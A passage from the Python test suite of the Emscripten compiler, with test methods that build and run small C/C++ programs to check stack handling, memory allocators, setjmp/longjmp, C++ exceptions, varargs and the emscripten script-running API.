self.emcc('main.c', ['-c'])
building.emar('cr', 'liba.a', ['a1.c.o', 'a2.c.o'])
building.emar('cr', 'libb.a', ['b1.c.o', 'b2.c.o'])
building.link_to_object(['main.c.o', 'liba.a', 'libb.a'], 'all.o')
self.emcc('all.o', self.get_emcc_args(), 'all.js')
self.do_run('all.js', 'result: 1', no_build=True)
def test_if(self):
self.do_core_test('test_if.c')
def test_if_else(self):
self.do_core_test('test_if_else.c')
def test_loop(self):
self.do_core_test('test_loop.c')
def test_stack(self):
self.set_setting('INLINING_LIMIT')
# some extra coverage in all test suites for stack checks
self.set_setting('STACK_OVERFLOW_CHECK', 2)
self.do_core_test('test_stack.c')
def test_stack_align(self):
src = test_file('core/test_stack_align.cpp')
def test():
self.do_runf(src, ['''align 4: 0
align 8: 0
align 16: 0
align 32: 0
base align: 0, 0, 0, 0'''])
test()
@no_asan('stack size is too low for asan to work properly')
def test_stack_placement(self):
self.set_setting('TOTAL_STACK', 1024)
self.do_core_test('test_stack_placement.c')
self.set_setting('GLOBAL_BASE', 102400)
self.do_core_test('test_stack_placement.c')
@no_asan('asan does not support main modules')
@no_lsan('asan does not support main modules')
@no_wasm2js('MAIN_MODULE support')
def test_stack_placement_pic(self):
self.set_setting('TOTAL_STACK', 1024)
self.set_setting('MAIN_MODULE')
self.do_core_test('test_stack_placement.c')
self.set_setting('GLOBAL_BASE', 102400)
self.do_core_test('test_stack_placement.c')
def test_strings(self):
self.do_core_test('test_strings.c', args=['wowie', 'too', '74'])
def test_strcmp_uni(self):
self.do_core_test('test_strcmp_uni.c')
def test_strndup(self):
self.do_core_test('test_strndup.c')
def test_errar(self):
self.do_core_test('test_errar.c')
def test_mainenv(self):
self.do_core_test('test_mainenv.c')
def test_funcs(self):
self.do_core_test('test_funcs.c')
def test_structs(self):
self.do_core_test('test_structs.c')
gen_struct_src = '''
#include <stdio.h>
#include <stdlib.h>
#include "emscripten.h"
struct S
{
int x, y;
};
int main()
{
S* a = {{gen_struct}};
a->x = 51; a->y = 62;
printf("*%d,%d*\\n", a->x, a->y);
{{del_struct}}(a);
return 0;
}
'''
def test_mallocstruct(self):
self.do_run(self.gen_struct_src.replace('{{gen_struct}}', '(S*)malloc(sizeof(S))').replace('{{del_struct}}', 'free'), '*51,62*')
@no_asan('ASan does not support custom memory allocators')
@no_lsan('LSan does not support custom memory allocators')
@parameterized({
'normal': [],
'memvalidate': ['-DEMMALLOC_MEMVALIDATE'],
'memvalidate_verbose': ['-DEMMALLOC_MEMVALIDATE', '-DEMMALLOC_VERBOSE', '-DRANDOM_ITERS=130'],
})
def test_emmalloc(self, *args):
# in newer clang+llvm, the internal calls to malloc in emmalloc may be optimized under
# the assumption that they are external, so like in system_libs.py where we build
# malloc, we need to disable builtin here too
self.set_setting('MALLOC', 'none')
self.emcc_args += ['-fno-builtin'] + list(args)
self.do_run(read_file(path_from_root('system/lib/emmalloc.c')) +
read_file(path_from_root('system/lib/sbrk.c')) +
read_file(test_file('core/test_emmalloc.c')),
read_file(test_file('core/test_emmalloc.out')), force_c=True)
@no_asan('ASan does not support custom memory allocators')
@no_lsan('LSan does not support custom memory allocators')
def test_emmalloc_usable_size(self, *args):
self.set_setting('MALLOC', 'emmalloc')
self.emcc_args += list(args)
self.do_core_test('test_malloc_usable_size.c')
@no_optimize('output is sensitive to optimization flags, so only test unoptimized builds')
@no_asan('ASan does not support custom memory allocators')
@no_lsan('LSan does not support custom memory allocators')
def test_emmalloc_memory_statistics(self, *args):
self.set_setting('MALLOC', 'emmalloc')
self.emcc_args += ['-sINITIAL_MEMORY=128MB', '-g'] + list(args)
self.do_core_test('test_emmalloc_memory_statistics.cpp')
@no_optimize('output is sensitive to optimization flags, so only test unoptimized builds')
@no_asan('ASan does not support custom memory allocators')
@no_lsan('LSan does not support custom memory allocators')
def test_emmalloc_trim(self, *args):
self.set_setting('MALLOC', 'emmalloc')
self.emcc_args += ['-sINITIAL_MEMORY=128MB', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=2147418112'] + list(args)
self.do_core_test('test_emmalloc_trim.cpp')
# Test case against https://github.com/emscripten-core/emscripten/issues/10363
def test_emmalloc_memalign_corruption(self, *args):
self.set_setting('MALLOC', 'emmalloc')
self.do_core_test('emmalloc_memalign_corruption.cpp')
def test_newstruct(self):
self.do_run(self.gen_struct_src.replace('{{gen_struct}}', 'new S').replace('{{del_struct}}', 'delete'), '*51,62*')
def test_addr_of_stacked(self):
self.do_core_test('test_addr_of_stacked.c')
def test_globals(self):
self.do_core_test('test_globals.c')
def test_linked_list(self):
self.do_core_test('test_linked_list.c')
def test_sup(self):
self.do_run_in_out_file_test(test_file('core/test_sup.cpp'))
@also_with_standalone_wasm()
def test_assert(self):
self.do_core_test('test_assert.cpp', assert_returncode=NON_ZERO)
def test_wcslen(self):
self.do_core_test('test_wcslen.c')
def test_regex(self):
self.do_core_test('test_regex.c')
@also_with_standalone_wasm(wasm2c=True, impure=True)
def test_longjmp_standalone(self):
self.do_core_test('test_longjmp.c')
@with_both_eh_sjlj
def test_longjmp(self):
self.do_core_test('test_longjmp.c')
def test_longjmp_with_and_without_exceptions(self):
# Emscripten SjLj with and without Emscripten EH support
self.set_setting('SUPPORT_LONGJMP', 'emscripten')
self.set_setting('DEFAULT_TO_CXX') # See comments on @with_both_eh_sjlj
for disable_catching in [0, 1]:
self.set_setting('DISABLE_EXCEPTION_CATCHING', disable_catching)
self.do_core_test('test_longjmp.c')
# Wasm SjLj with and without Wasm EH support
self.set_setting('SUPPORT_LONGJMP', 'wasm')
if not self.is_wasm():
self.skipTest('wasm2js does not support wasm EH/SjLj')
self.require_v8()
# FIXME Temporarily disabled. Enable this later when the bug is fixed.
if '-fsanitize=address' in self.emcc_args:
self.skipTest('Wasm EH does not work with asan yet')
self.emcc_args.append('-fwasm-exceptions')
self.v8_args.append('--experimental-wasm-eh')
old_args = self.emcc_args.copy()
for arg in ['-fwasm-exceptions', '-fno-exceptions']:
self.emcc_args.append(arg)
self.do_core_test('test_longjmp.c')
self.emcc_args = old_args
@with_both_eh_sjlj
def test_longjmp2(self):
self.do_core_test('test_longjmp2.c')
@needs_dylink
@with_both_eh_sjlj
def test_longjmp2_main_module(self):
# Test for binaryen regression:
# https://github.com/WebAssembly/binaryen/issues/2180
self.set_setting('MAIN_MODULE')
self.do_core_test('test_longjmp2.c')
@with_both_eh_sjlj
def test_longjmp3(self):
self.do_core_test('test_longjmp3.c')
@with_both_eh_sjlj
def test_longjmp4(self):
self.do_core_test('test_longjmp4.c')
@with_both_eh_sjlj
def test_longjmp_funcptr(self):
self.do_core_test('test_longjmp_funcptr.c')
@with_both_eh_sjlj
def test_longjmp_repeat(self):
self.do_core_test('test_longjmp_repeat.c')
@with_both_eh_sjlj
def test_longjmp_stacked(self):
self.do_core_test('test_longjmp_stacked.c', assert_returncode=NON_ZERO)
@with_both_eh_sjlj
def test_longjmp_exc(self):
self.do_core_test('test_longjmp_exc.c', assert_returncode=NON_ZERO)
def test_longjmp_throw(self):
for disable_throw in [0, 1]:
print(disable_throw)
self.set_setting('DISABLE_EXCEPTION_CATCHING', disable_throw)
self.do_core_test('test_longjmp_throw.cpp')
@with_both_eh_sjlj
def test_longjmp_unwind(self):
self.do_core_test('test_longjmp_unwind.c', assert_returncode=NON_ZERO)
@with_both_eh_sjlj
def test_longjmp_i64(self):
self.emcc_args += ['-g']
self.do_core_test('test_longjmp_i64.c', assert_returncode=NON_ZERO)
@with_both_eh_sjlj
def test_siglongjmp(self):
self.do_core_test('test_siglongjmp.c')
@with_both_eh_sjlj
def test_setjmp_many(self):
src = r'''
#include <stdio.h>
#include <setjmp.h>
int main(int argc, char** argv) {
jmp_buf buf;
for (int i = 0; i < NUM; i++) printf("%d\n", setjmp(buf));
if (argc-- == 1131) longjmp(buf, 11);
return 0;
}
'''
for num in [1, 5, 20, 1000]:
print('NUM=%d' % num)
self.do_run(src.replace('NUM', str(num)), '0\n' * num)
@with_both_eh_sjlj
def test_setjmp_many_2(self):
src = r'''
#include <setjmp.h>
#include <stdio.h>
jmp_buf env;
void luaWork(int d){
int x;
printf("d is at %d\n", d);
longjmp(env, 1);
}
int main()
{
const int ITERATIONS=25;
for(int i = 0; i < ITERATIONS; i++){
if(!setjmp(env)){
luaWork(i);
}
}
return 0;
}
'''
self.do_run(src, r'''d is at 24''')
@with_both_eh_sjlj
def test_setjmp_noleak(self):
self.do_runf(test_file('core/test_setjmp_noleak.c'), 'ok.')
@with_both_eh_sjlj
def test_setjmp_within_loop(self):
self.do_core_test('test_setjmp_within_loop.c')
@with_both_eh_sjlj
def test_exceptions(self):
self.set_setting('EXCEPTION_DEBUG')
self.maybe_closure()
self.do_run_from_file(test_file('core/test_exceptions.cpp'), test_file('core/test_exceptions_caught.out'))
def test_exceptions_with_and_without_longjmp(self):
self.set_setting('EXCEPTION_DEBUG')
self.maybe_closure()
# Emscripten EH with and without Emscripten SjLj support
self.set_setting('DISABLE_EXCEPTION_CATCHING', 0)
for support_longjmp in [0, 'emscripten']:
self.set_setting('SUPPORT_LONGJMP', support_longjmp)
self.do_run_from_file(test_file('core/test_exceptions.cpp'), test_file('core/test_exceptions_caught.out'))
# Wasm EH with and without Wasm SjLj support
self.set_setting('DISABLE_EXCEPTION_CATCHING', 1)
if not self.is_wasm():
self.skipTest('wasm2js does not support wasm EH/SjLj')
self.require_v8()
# FIXME Temporarily disabled. Enable this later when the bug is fixed.
if '-fsanitize=address' in self.emcc_args:
self.skipTest('Wasm EH does not work with asan yet')
self.emcc_args.append('-fwasm-exceptions')
self.v8_args.append('--experimental-wasm-eh')
for support_longjmp in [0, 'wasm']:
self.set_setting('SUPPORT_LONGJMP', support_longjmp)
self.do_run_from_file(test_file('core/test_exceptions.cpp'), test_file('core/test_exceptions_caught.out'))
def test_exceptions_off(self):
for support_longjmp in [0, 1]:
self.set_setting('DISABLE_EXCEPTION_CATCHING')
self.do_run_from_file(test_file('core/test_exceptions.cpp'), test_file('core/test_exceptions_uncaught.out'), assert_returncode=NON_ZERO)
@no_asan('TODO: ASan support in minimal runtime')
def test_exceptions_minimal_runtime(self):
self.set_setting('EXCEPTION_DEBUG')
self.set_setting('EXIT_RUNTIME')
self.maybe_closure()
self.set_setting('MINIMAL_RUNTIME')
self.emcc_args += ['--pre-js', test_file('minimal_runtime_exit_handling.js')]
for support_longjmp in [0, 1]:
self.set_setting('SUPPORT_LONGJMP', support_longjmp)
self.set_setting('DISABLE_EXCEPTION_CATCHING', 0)
self.do_run_from_file(test_file('core/test_exceptions.cpp'), test_file('core/test_exceptions_caught.out'))
self.set_setting('DISABLE_EXCEPTION_CATCHING')
self.do_run_from_file(test_file('core/test_exceptions.cpp'), test_file('core/test_exceptions_uncaught.out'), assert_returncode=NON_ZERO)
@with_both_eh_sjlj
def test_exceptions_custom(self):
self.set_setting('EXCEPTION_DEBUG')
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.maybe_closure()
src = '''
#include <iostream>
class MyException
{
public:
MyException(){ std::cout << "Construct..."; }
MyException( const MyException & ) { std::cout << "Copy..."; }
~MyException(){ std::cout << "Destruct..."; }
};
int function()
{
std::cout << "Throw...";
throw MyException();
}
int function2()
{
return function();
}
int main()
{
try
{
function2();
}
catch (MyException & e)
{
std::cout << "Caught...";
}
try
{
function2();
}
catch (MyException e)
{
std::cout << "Caught...";
}
return 0;
}
'''
self.do_run(src, 'Throw...Construct...Caught...Destruct...Throw...Construct...Copy...Caught...Destruct...Destruct...')
@with_both_eh_sjlj
def test_exceptions_2(self):
for safe in [0, 1]:
print(safe)
if safe and '-fsanitize=address' in self.emcc_args:
# Can't use safe heap with ASan
continue
self.set_setting('SAFE_HEAP', safe)
self.do_core_test('test_exceptions_2.cpp')
@with_both_eh_sjlj
def test_exceptions_3(self):
src = r'''
#include <iostream>
#include <stdexcept>
int main(int argc, char **argv)
{
if (argc != 2) {
std::cout << "need an arg" << std::endl;
return 1;
}
int arg = argv[1][0] - '0';
try {
if (arg == 0) throw "a c string";
if (arg == 1) throw std::exception();
if (arg == 2) throw std::runtime_error("Hello");
} catch(const char * ex) {
std::cout << "Caught C string: " << ex << std::endl;
} catch(const std::exception &ex) {
std::cout << "Caught exception: " << ex.what() << std::endl;
} catch(...) {
std::cout << "Caught something else" << std::endl;
}
std::cout << "Done.\n";
}
'''
print('0')
self.do_run(src, 'Caught C string: a c string\nDone.', args=['0'])
print('1')
self.do_run('src.js', 'Caught exception: std::exception\nDone.', args=['1'], no_build=True)
print('2')
self.do_run('src.js', 'Caught exception: Hello\nDone.', args=['2'], no_build=True)
def test_exceptions_allowed(self):
self.set_setting('EXCEPTION_CATCHING_ALLOWED', ["_Z12somefunctionv"])
# otherwise it is inlined and not identified
self.set_setting('INLINING_LIMIT')
self.do_core_test('test_exceptions_allowed.cpp')
size = os.path.getsize('test_exceptions_allowed.js')
if self.is_wasm():
size += os.path.getsize('test_exceptions_allowed.wasm')
shutil.copyfile('test_exceptions_allowed.js', 'orig.js')
# check that an empty allow list works properly (as in, same as exceptions disabled)
src = test_file('core/test_exceptions_allowed.cpp')
empty_output = test_file('core/test_exceptions_allowed_empty.out')
self.set_setting('EXCEPTION_CATCHING_ALLOWED', [])
self.do_run_from_file(src, empty_output, assert_returncode=NON_ZERO)
empty_size = os.path.getsize('test_exceptions_allowed.js')
if self.is_wasm():
empty_size += os.path.getsize('test_exceptions_allowed.wasm')
shutil.copyfile('test_exceptions_allowed.js', 'empty.js')
self.set_setting('EXCEPTION_CATCHING_ALLOWED', ['fake'])
self.do_run_from_file(src, empty_output, assert_returncode=NON_ZERO)
fake_size = os.path.getsize('test_exceptions_allowed.js')
if self.is_wasm():
fake_size += os.path.getsize('test_exceptions_allowed.wasm')
shutil.copyfile('test_exceptions_allowed.js', 'fake.js')
self.clear_setting('EXCEPTION_CATCHING_ALLOWED')
self.do_run_from_file(src, empty_output, assert_returncode=NON_ZERO)
disabled_size = os.path.getsize('test_exceptions_allowed.js')
if self.is_wasm():
disabled_size += os.path.getsize('test_exceptions_allowed.wasm')
shutil.copyfile('test_exceptions_allowed.js', 'disabled.js')
print('size: %d' % size)
print('empty_size: %d' % empty_size)
print('fake_size: %d' % fake_size)
print('disabled_size: %d' % disabled_size)
# empty list acts the same as fully disabled
self.assertEqual(empty_size, disabled_size)
# big change when we disable exception catching of the function
if '-fsanitize=leak' not in self.emcc_args:
self.assertGreater(size - empty_size, 0.01 * size)
# full disable can remove a little bit more
self.assertLess(disabled_size, fake_size)
def test_exceptions_allowed_2(self):
self.set_setting('EXCEPTION_CATCHING_ALLOWED', ["main"])
# otherwise it is inlined and not identified
self.set_setting('INLINING_LIMIT')
self.do_core_test('test_exceptions_allowed_2.cpp')
# When 'main' function does not have a signature, its contents will be
# outlined to '__original_main'. Check if we can handle that case.
self.emcc_args += ['-DMAIN_NO_SIGNATURE']
self.do_core_test('test_exceptions_allowed_2.cpp')
def test_exceptions_allowed_uncaught(self):
self.emcc_args += ['-std=c++11']
self.set_setting('EXCEPTION_CATCHING_ALLOWED', ["_Z4testv"])
# otherwise it is inlined and not identified
self.set_setting('INLINING_LIMIT')
self.do_core_test('test_exceptions_allowed_uncaught.cpp')
def test_exceptions_allowed_misuse(self):
self.set_setting('EXCEPTION_CATCHING_ALLOWED', ['foo'])
# Test old =2 setting for DISABLE_EXCEPTION_CATCHING
self.set_setting('DISABLE_EXCEPTION_CATCHING', 2)
err = self.expect_fail([EMCC, test_file('hello_world.c')] + self.get_emcc_args())
self.assertContained('error: DISABLE_EXCEPTION_CATCHING=X is no longer needed when specifying EXCEPTION_CATCHING_ALLOWED [-Wdeprecated] [-Werror]', err)
# =0 should also be a warning
self.set_setting('DISABLE_EXCEPTION_CATCHING', 0)
err = self.expect_fail([EMCC, test_file('hello_world.c')] + self.get_emcc_args())
self.assertContained('error: DISABLE_EXCEPTION_CATCHING=X is no longer needed when specifying EXCEPTION_CATCHING_ALLOWED [-Wdeprecated] [-Werror]', err)
# =1 should be a hard error
self.set_setting('DISABLE_EXCEPTION_CATCHING', 1)
err = self.expect_fail([EMCC, test_file('hello_world.c')] + self.get_emcc_args())
self.assertContained('error: DISABLE_EXCEPTION_CATCHING and EXCEPTION_CATCHING_ALLOWED are mutually exclusive', err)
# even setting an empty list should trigger the error;
self.set_setting('EXCEPTION_CATCHING_ALLOWED', [])
err = self.expect_fail([EMCC, test_file('hello_world.c')] + self.get_emcc_args())
self.assertContained('error: DISABLE_EXCEPTION_CATCHING and EXCEPTION_CATCHING_ALLOWED are mutually exclusive', err)
@with_both_eh_sjlj
def test_exceptions_uncaught(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
src = r'''
#include <stdio.h>
#include <exception>
struct X {
~X() {
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
}
};
int main() {
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
try {
X x;
throw 1;
} catch(...) {
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
}
printf("exception? %s\n", std::uncaught_exception() ? "yes" : "no");
return 0;
}
'''
self.do_run(src, 'exception? no\nexception? yes\nexception? no\nexception? no\n')
src = r'''
#include <fstream>
#include <iostream>
int main() {
std::ofstream os("test");
os << std::unitbuf << "foo"; // trigger a call to std::uncaught_exception from
// std::basic_ostream::sentry::~sentry
std::cout << "success";
}
'''
self.do_run(src, 'success')
@with_both_eh_sjlj
def test_exceptions_uncaught_2(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
src = r'''
#include <iostream>
#include <exception>
int main() {
try {
throw std::exception();
} catch(std::exception) {
try {
throw;
} catch(std::exception) {}
}
if (std::uncaught_exception())
std::cout << "ERROR: uncaught_exception still set.";
else
std::cout << "OK";
}
'''
self.do_run(src, 'OK\n')
@with_both_eh_sjlj
def test_exceptions_typed(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.clear_setting('SAFE_HEAP') # Throwing null will cause an ignorable null pointer access.
self.do_core_test('test_exceptions_typed.cpp')
@with_both_eh_sjlj
def test_exceptions_virtual_inheritance(self):
self.do_core_test('test_exceptions_virtual_inheritance.cpp')
@with_both_eh_sjlj
def test_exceptions_convert(self):
self.do_core_test('test_exceptions_convert.cpp')
# TODO Make setjmp-longjmp also use Wasm exception handling
@with_both_eh_sjlj
def test_exceptions_multi(self):
self.do_core_test('test_exceptions_multi.cpp')
@with_both_eh_sjlj
def test_exceptions_std(self):
self.clear_setting('SAFE_HEAP')
self.do_core_test('test_exceptions_std.cpp')
@with_both_eh_sjlj
def test_exceptions_alias(self):
self.do_core_test('test_exceptions_alias.cpp')
@with_both_eh_sjlj
def test_exceptions_rethrow(self):
self.do_core_test('test_exceptions_rethrow.cpp')
@with_both_eh_sjlj
def test_exceptions_uncaught_count(self):
self.do_core_test('test_exceptions_uncaught_count.cpp')
@with_both_eh_sjlj
def test_exceptions_resume(self):
self.set_setting('EXCEPTION_DEBUG')
self.do_core_test('test_exceptions_resume.cpp')
@with_both_eh_sjlj
def test_exceptions_destroy_virtual(self):
self.do_core_test('test_exceptions_destroy_virtual.cpp')
@with_both_eh_sjlj
def test_exceptions_refcount(self):
self.do_core_test('test_exceptions_refcount.cpp')
@with_both_eh_sjlj
def test_exceptions_primary(self):
self.do_core_test('test_exceptions_primary.cpp')
@with_both_eh_sjlj
def test_exceptions_simplify_cfg(self):
self.do_core_test('test_exceptions_simplify_cfg.cpp')
@with_both_eh_sjlj
def test_exceptions_libcxx(self):
self.do_core_test('test_exceptions_libcxx.cpp')
@with_both_eh_sjlj
def test_exceptions_multiple_inherit(self):
self.do_core_test('test_exceptions_multiple_inherit.cpp')
@with_both_eh_sjlj
def test_exceptions_multiple_inherit_rethrow(self):
self.do_core_test('test_exceptions_multiple_inherit_rethrow.cpp')
@with_both_eh_sjlj
def test_exceptions_rethrow_missing(self):
create_file('main.cpp', 'int main() { throw; }')
self.do_runf('main.cpp', None, assert_returncode=NON_ZERO)
@with_both_eh_sjlj
def test_bad_typeid(self):
self.do_run(r'''
// exception example
#include <iostream> // std::cerr
#include <typeinfo> // operator typeid
#include <exception> // std::exception
class Polymorphic {virtual void member(){}};
int main () {
try
{
Polymorphic * pb = 0;
const std::type_info& ti = typeid(*pb); // throws a bad_typeid exception
}
catch (std::exception& e)
{
std::cerr << "exception caught: " << e.what() << '\n';
}
return 0;
}
''', 'exception caught: std::bad_typeid')
def test_iostream_ctors(self):
# iostream stuff must be globally constructed before user global
# constructors, so iostream works in global constructors
self.do_run(r'''
#include <iostream>
struct A {
A() { std::cout << "bug"; }
};
A a;
int main() {
std::cout << "free code" << std::endl;
return 0;
}
''', 'bugfree code')
@with_both_eh_sjlj
def test_exceptions_longjmp1(self):
self.do_core_test('test_exceptions_longjmp1.cpp')
@with_both_eh_sjlj
def test_exceptions_longjmp2(self):
self.do_core_test('test_exceptions_longjmp2.cpp')
@with_both_eh_sjlj
def test_exceptions_longjmp3(self):
self.do_core_test('test_exceptions_longjmp3.cpp')
@with_both_eh_sjlj
def test_exceptions_longjmp4(self):
self.do_core_test('test_exceptions_longjmp4.cpp')
# Marked as impure since the WASI reactor modules (modules without main)
# are not yet supported by the wasm engines we test against.
@also_with_standalone_wasm(impure=True)
def test_ctors_no_main(self):
self.emcc_args.append('--no-entry')
self.do_core_test('test_ctors_no_main.cpp')
@no_wasm2js('eval_ctors not supported yet')
@also_with_standalone_wasm(impure=True)
def test_eval_ctors_no_main(self):
self.set_setting('EVAL_CTORS')
self.emcc_args.append('--no-entry')
self.do_core_test('test_ctors_no_main.cpp')
def test_class(self):
self.do_core_test('test_class.cpp')
def test_inherit(self):
self.do_core_test('test_inherit.cpp')
def test_isdigit_l(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_isdigit_l.cpp')
def test_iswdigit(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_core_test('test_iswdigit.cpp')
def test_polymorph(self):
self.do_core_test('test_polymorph.cpp')
def test_complex(self):
self.do_core_test('test_complex.c')
def test_float_builtins(self):
# tests wasm_libc_rt
self.do_core_test('test_float_builtins.c')
@no_asan('SAFE_HEAP cannot be used with ASan')
def test_segfault(self):
self.set_setting('SAFE_HEAP')
for addr in ['get_null()', 'new D2()']:
print(addr)
src = r'''
#include <stdio.h>
#include <emscripten.h>
struct Classey {
virtual void doIt() = 0;
virtual ~Classey() = default;
};
struct D1 : Classey {
virtual void doIt() { printf("fleefl\n"); }
};
struct D2 : Classey {
virtual void doIt() { printf("marfoosh\n"); }
};
EM_JS(Classey*, get_null, (), {
return 0;
});
int main(int argc, char **argv) {
Classey *p = argc == 100 ? new D1() : (Classey*)%s;
p->doIt();
delete p;
return 0;
}
''' % addr
if 'get_null' in addr:
self.do_run(src, 'segmentation fault', assert_returncode=NON_ZERO)
else:
self.do_run(src, 'marfoosh')
def test_dynamic_cast(self):
self.do_core_test('test_dynamic_cast.cpp')
def test_dynamic_cast_b(self):
self.do_core_test('test_dynamic_cast_b.cpp')
def test_dynamic_cast_2(self):
self.do_core_test('test_dynamic_cast_2.cpp')
def test_funcptr(self):
self.do_core_test('test_funcptr.c')
def test_mathfuncptr(self):
self.do_core_test('test_mathfuncptr.c')
def test_funcptrfunc(self):
self.do_core_test('test_funcptrfunc.c')
def test_funcptr_namecollide(self):
self.do_core_test('test_funcptr_namecollide.c')
def test_emptyclass(self):
self.do_core_test('test_emptyclass.cpp')
def test_alloca(self):
self.do_core_test('test_alloca.c')
@also_with_wasmfs
def test_rename(self):
if is_sanitizing(self.emcc_args) and self.get_setting('WASMFS'):
self.skipTest('https://github.com/emscripten-core/emscripten/issues/15820')
self.do_run_in_out_file_test('stdio/test_rename.c')
def test_remove(self):
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.do_run_in_out_file_test('cstdio/test_remove.cpp')
def test_alloca_stack(self):
self.do_core_test('test_alloca_stack.c')
def test_stack_byval(self):
self.do_core_test('test_stack_byval.cpp')
def test_stack_varargs(self):
# in node.js we allocate argv[0] on the stack, which means the length
# of the program directory influences how much stack we need, and so
# long random temp dir names can lead to random failures. The stack
# size was increased here to avoid that.
self.set_setting('INLINING_LIMIT')
self.set_setting('TOTAL_STACK', 8 * 1024)
self.do_core_test('test_stack_varargs.c')
def test_stack_varargs2(self):
# in node.js we allocate argv[0] on the stack, which means the length
# of the program directory influences how much stack we need, and so
# long random temp dir names can lead to random failures. The stack
# size was increased here to avoid that.
self.set_setting('TOTAL_STACK', 8 * 1024)
src = r'''
#include <stdio.h>
#include <stdlib.h>
void func(int i) {
}
int main() {
for (int i = 0; i < 7000; i++) {
printf("%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d\n",
i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i);
}
printf("ok!\n");
return 0;
}
'''
self.do_run(src, 'ok!')
print('with return')
src = r'''
#include <stdio.h>
#include <stdlib.h>
int main() {
for (int i = 0; i < 7000; i++) {
int j = printf("%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d",
i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i);
printf(" (%d)\n", j);
}
printf("ok!\n");
return 0;
}
'''
self.do_run(src, 'ok!')
print('with definitely no return')
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
void vary(const char *s, ...)
{
va_list v;
va_start(v, s);
char d[20];
vsnprintf(d, 20, s, v);
puts(d);
// Try it with copying
va_list tempva;
va_copy(tempva, v);
vsnprintf(d, 20, s, tempva);
puts(d);
va_end(v);
}
int main() {
for (int i = 0; i < 7000; i++) {
int j = printf("%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d",
i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i, i);
printf(" (%d)\n", j);
vary("*cheez: %d+%d*", 99, 24);
vary("*albeit*");
}
printf("ok!\n");
return 0;
}
'''
self.do_run(src, 'ok!')
def test_stack_void(self):
self.emcc_args.append('-Wno-format-extra-args')
self.set_setting('INLINING_LIMIT')
self.do_core_test('test_stack_void.c')
def test_life(self):
self.emcc_args += ['-std=c99']
self.do_run_in_out_file_test('life.c', args=['2'])
def test_array2(self):
self.do_core_test('test_array2.c')
def test_array2b(self):
self.do_core_test('test_array2b.c')
def test_constglobalstructs(self):
self.do_core_test('test_constglobalstructs.c')
def test_conststructs(self):
self.do_core_test('test_conststructs.c')
def test_bigarray(self):
self.do_core_test('test_bigarray.c')
def test_mod_globalstruct(self):
self.do_core_test('test_mod_globalstruct.c')
def test_sizeof(self):
self.do_core_test('test_sizeof.cpp')
def test_llvm_used(self):
self.do_core_test('test_llvm_used.c')
@no_asan('SAFE_HEAP cannot be used with ASan')
def test_set_align(self):
self.set_setting('SAFE_HEAP')
self.do_core_test('test_set_align.c')
def test_emscripten_api(self):
self.set_setting('EXPORTED_FUNCTIONS', ['_main', '_save_me_aimee'])
self.do_core_test('test_emscripten_api.cpp')
# Sanitizers are not compatible with LINKABLE (dynamic linking).
if not is_sanitizing(self.emcc_args):
# test EXPORT_ALL
self.set_setting('EXPORTED_FUNCTIONS', [])
self.set_setting('EXPORT_ALL')
self.set_setting('LINKABLE')
self.do_core_test('test_emscripten_api.cpp')
def test_emscripten_run_script_string_int(self):
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
const char *str = emscripten_run_script_string("1+1");
printf("got string: %s\n", str);
return 0;
}
'''
self.do_run(src, '''got string: 2''')
def test_emscripten_run_script_string_utf8(self):
src = r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
int main() {
const char *str = emscripten_run_script_string("'\\u2603 \\u2603 \\u2603 Hello!'");
printf("length of returned string: %zu. Position of substring 'Hello': %zu\n", strlen(str), strstr(str, "Hello")-str);
return 0;
}
'''
self.do_run(src, '''length of returned string: 18. Position of substring 'Hello': 12''')
def test_emscripten_run_script_string_null(self):
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
const char *str = emscripten_run_script_string("void(0)");
if (str) {
printf("got string: %s\n", str);
} else {
puts("got null");
}
return 0;
}
'''
self.do_run(src, 'got null')
def test_emscripten_get_now(self):
self.banned_js_engines = [config.V8_ENGINE] # timer limitations in v8 shell
# needs to flush stdio streams
self.set_setting('EXIT_RUNTIME')
self.maybe_closure()
self.do_runf(test_file('emscripten_get_now.cpp'), 'Timer resolution is good')
def test_emscripten_get_compiler_setting(self):
src = test_file('core/emscripten_get_compiler_setting.c')
output = shared.replace_suffix(src, '.out')
# with assertions, a nice message is shown
self.set_setting('ASSERTIONS')
self.do_runf(src, 'You must build with -s RETAIN_COMPILER_SETTINGS=1', assert_returncode=NON_ZERO)
self.clear_setting('ASSERTIONS')
self.set_setting('RETAIN_COMPILER_SETTINGS')
self.do_runf(src, read_file(output).replace('waka', shared.EMSCRIPTEN_VERSION))
def test_emscripten_has_asyncify(self):
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
